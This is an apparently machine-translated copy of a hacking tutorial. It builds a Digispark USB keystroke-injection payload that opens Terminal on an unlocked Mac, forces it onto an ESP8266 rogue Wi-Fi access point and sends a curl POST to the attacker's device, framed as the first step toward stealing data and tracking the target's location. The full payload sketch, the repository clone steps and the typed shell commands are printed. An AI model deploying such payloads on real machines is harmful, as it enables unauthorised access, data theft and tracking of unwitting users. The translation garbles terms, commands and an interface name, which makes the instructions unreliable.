قالب وردپرس درنا توس
Home / Tips and Tricks / Creation of MacOS payloads to insert a Wi-Fi backdoor «Null Byte :: WonderHowTo

Creation of MacOS payloads to insert a Wi-Fi backdoor «Null Byte :: WonderHowTo



Arduino is a language that is easy to learn and supported on many incredibly inexpensive devices. Two of them are the Digispark for $ 2 and an ESP8266 based board for $ 3. We can program these devices in Arduino to hijack the Wi-Fi data connection of any unlocked MacOS computer in a matter of seconds, and we can even send data from the target device to our low-cost evil access point.

Arduino-compatible devices continue to lower the entry barrier to building cheap prototypes, and prototyping new types of attacks using Wi-Fi and USB rubber ducky attacks is no different. By leveraging the trust that a Mac has in its "preferred" Wi-Fi networks, we can quickly establish a backdoor connection with a Digispark USB payload and send data from the target Mac to our ESP8266 web server.

What is a list of preferred networks?

Every time you connect to a Wi-Fi network, your device adds the network to a list of trusted Wi-Fi networks called the Preferred Network List (PNL). The list keeps your computer connected to Wi-Fi while you switch between networks. For convenience, most operating systems automatically connect to these networks by default to provide a seamless experience. However, it does open up some opportunities that attackers can take advantage of.

By adding a Rouge network to the PNL, we can force a device to connect to a malicious AP whenever we want. For example, we can steal data from the device without having to create a server on the web. Instead, we can remove the user from their connected hotspot and know that they will connect to ours and not the real one. In a later guide, we'll build on that to steal the target's WiFi connection history and track the target's location every 60 seconds.

Adding an evil AP with Arduino

We'll use two extremely inexpensive devices to demonstrate what can be done on a limited budget. The first device is a Digispark, a small Arduino-programmable USB development board that is capable of entering Ducky Script-like commands by posing as a keyboard. The attacker can write a payload for each operating system and feed it to an open and unlocked computer in a matter of seconds.

The second part of our attack is carried out with an ESP8266 Wi-Fi development board like the D1

Mini is also programmable in Arduino. This creates the evil AP that our target computer connects to. We connect the Arduino to our computer serially in order to receive data from the target computer via Wi-Fi and print it out on the screen.

These two devices together perform a data robbery attack, creating the ESP2866. A network for the Digispark script that forces the victim to connect. Once the connection is made, we can do a lot in the background using the ESP8266 to steal data or remotely control the computer. In this simple example, we send the output of a command to show that we can get the data from the device, but we'll get more creative with the payload in the next manual.

What You Will Need

We're going to use a pair of Arduino devices for $ 5, so the budget here is very small (minus the MacOS computer to test the payload on) , First you need a Digispark board. Now that they are very popular, they are made by many different manufacturers so you can easily find what you need. One of the cheapest clones you can get is on AliExpress for less than two dollars but you'll have to wait a long time for it to arrive. If you're more of an Amazon buyer, they also have some that ship faster, but the cost is higher.

You also need an ESP8266-based board like a simple D1 Mini that can be found on AliExpress for less than three dollars. You'll need to install a driver on it, but if you want a nicer D1 Mini that doesn't require a driver and has the ability to swap antennas, AliExpress offers one for a few dollars more. Again, delivery will take some time, but Amazon offers faster shipping options for a bit more money. You can also use other ESP8266-based cards like the NodeMCU, but I recommend the D1 from personal experience.

Optionally, you can add a red LED and a 330 ohm resistor. You can follow the instructions for The Chicken Man Game or the instructions below to see which pin is connected to what. Apart from all of this, you need a micro USB cable to communicate with the D1 Mini.

Step 1: Setting up the Arduino IDE for the ESP8266 & Digispark

First we have to set up Arduino IDE for working with the Digispark board and the ESP8266. To do this, we have to open the Arduino IDE and call the "Settings" of the app. On the Settings tab, look for the Additional Boards Manager URLs field and paste the following URLs.

  http://arduino.esp8266.com/stable/package_esp8266com_index.json, http: // digistump .com / package_digistump_index.json 

Click "OK" and you should be able to find the relevant boards to select under the board manager. Under "Tools", click "Board" and then "Boards Manager" to display the list of installed boards. The board libraries that we need to install are the ESP8266 and the Digispark. First, find and select the "esp8266" from the ESP8266 community.

Find and select Digistump's "Digistump AVR Boards" in Digispark.

Once installed, we should be able to write from Arduino IDE to both boards.

Step 2: Open the sketch & flash of the ESP8266 Rogue AP

Now that we can write to the ESP8266, we open the file from the GitHub repository and open it in Arduino IDE. Run the following command in a new terminal window to download the scripts.

  ~ # git clone https://github.com/skickar/ChickenManGame.git

Cloning in & # 39; ChickenManGame & # 39; ...
remote: List objects: 246, done.
remote: count objects: 100% (246/246), done.
remote: compress objects: 100% (194/194), done.
Remote: A total of 613 (Delta 117), reused 168 (Delta 52), pack-reused 367
Objects received: 100% (613/613), 4.85 MiB | 4.81 MiB / s, done.
Dissolve deltas: 100% (285/285), done. 

In the first example we use a sketch I wrote for a Wi-Fi flag game called The Chicken Man Game rogue AP. In our tracking guides, we add a sketch for the ESP8266 to create a server for data exfiltration and tracking. Download the test sketch from a terminal window cd to the directory where your Arduino sketches are saved.

  ~ # cd ChickenManGame
~ / ChickenManGame # open ChickenManGame.ino 

This should open the ChickenManGame sketch in Arduino. We test our script by turning on a red LED and demonstrating that we have connected the target MacBook to our evil access point and sent it data.

If you have a red LED and a resistor, you can connect the positive pin of a red LED to pin D1 of the D1 Mini and the negative to a 330 ohm resistor. Connect the other end of the resistor to ground. If you don't add an LED, just keep an eye on the serial output to see when we managed to send data from the target device through our nasty AP.

When the ESP8266 is connected to the micro USB cable, select the correct card from the "Tools" dropdown menu (D1 Mini for me) and configure your settings as follows.

If everything looks correct, press the arrow at the top left of the IDE to transfer the sketch to the ESP8266. When you are finished, press Command-Shift-M to open a serial monitor. From here we start our Rouge AP and give us a unique Wi-Fi name and password. You should see an output like the one below.

  Mode: chicken
Resuscitated bird
Search for networks
Jimmy & # 39; s BEAUTY - VALUABLE!
CableWiFi - VALUABLE!
SpectrumWiFi - VALUABLE!
SpectrumWiFi - VALUABLE!
YOUNG X - VALUABLE!
Feet 2.4 GHz - VALUABLE!
DG1670A72 - VALUABLE!
GoGo Spot - VALUABLE!
WIFIEA18FDPlus - VALUABLE!
ID set to 6
--------------------------------------------
Flag: 0
Chicken Level: Medium
Chicken ID: 6
Channel: 7
MAC address: 18: FE: 34: 00: 01: 06
IP address: 192.168.4.1
SSID: Chicken_Medium_06
Password: aardvark
----------------------------------------- 

If you If you are on your Search your phone or computer for Wi-Fi networks if you see one named "SSID". Save the network name and password for the next step. Also leave this serial window open as we can see when we get the web request from the target.

Step 3: Open and flash Digispark HID Payload

Next we configure the Digispark part of the attack. To download the script, do the following in a new terminal window:

  ~ # git clone https://github.com/skickar/DigiTrack.git

Cloning in & # 39; DigiTrack & # 39; ...
remote: enumerate objects: 70, done.
remote: count objects: 100% (70/70), done.
remote: compress objects: 100% (70/70), done.
Remote: A total of 70 (Delta 41), reused 0 (Delta 0), pack-reused 0
Unpack objects: 100% (70/70), done. 

Then change to the directory and open the test sketch.

  ~ # cd DigiTrack
~ / DigiTrack # open chickentest.ino 

You are asked whether the chickentest.ino sketch should be saved in a new folder. If you do this, the following sketch should be open in Arduino IDE.

  #include "DigiKeyboard.h"
void setup () {}
void loop () {
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (0);
DigiKeyboard.sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("Terminal");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
DigiKeyboard.print ("networksetup -setairportnetwork en0 & # 39; WIFINAME & # 39; PASS");
DigiKeyboard.delay (1000);
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (6000);
DigiKeyboard.print ("curl -X POST 192.168.4.1/index.html?cmd=led+red");
DigiKeyboard.delay (1000);
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
for (;;) {/ * empty * /}} 

In the "WIFINAME" and "PASS" lines, enter the name of the Rouge AP you created. In our example we would change the line as follows:

  DigiKeyboard.print ("networksetup -setairportnetwork de0 & # 39; Chicken_Medium_06 & # 39; aardvark"); 

After making the change, select the Digispark from the drop-down list of boards.

Make sure the connection to Digispark is disconnected, and then click the upload button. You have 60 seconds to insert the Digispark. When you do this, the Micronucleus boot loader uploads the code to the Digispark and you can unplug the Digispark when the following is displayed.

  Running: 100% complete
>> Micronucleus done. Thanks a lot! 

Make sure that you disconnect the Digispark from the mains immediately after flashing. Otherwise the payload will be executed after a second or two.

Step 4: Monitor the ESP8266 serially and insert the payload.

Now we have created a rouge AP from the ESP8266, which we monitor via serial and a payload ready and waiting for our Digispark. It's time to try our payload on the target Mac computer!

Insert the Digispark into the Mac and you should do the following payload.

  networksetup -setairportnetwork de0 & # 39; Chicken_Medium_06 & # 39; aardvark
curl -X POST 192.168.4.1/index.html?cmd=led+red
  LAY YOUR EGG   Red team   Green team   Blue team 

See red?

Cover photo and screenshots from Kody / Null Byte




Source link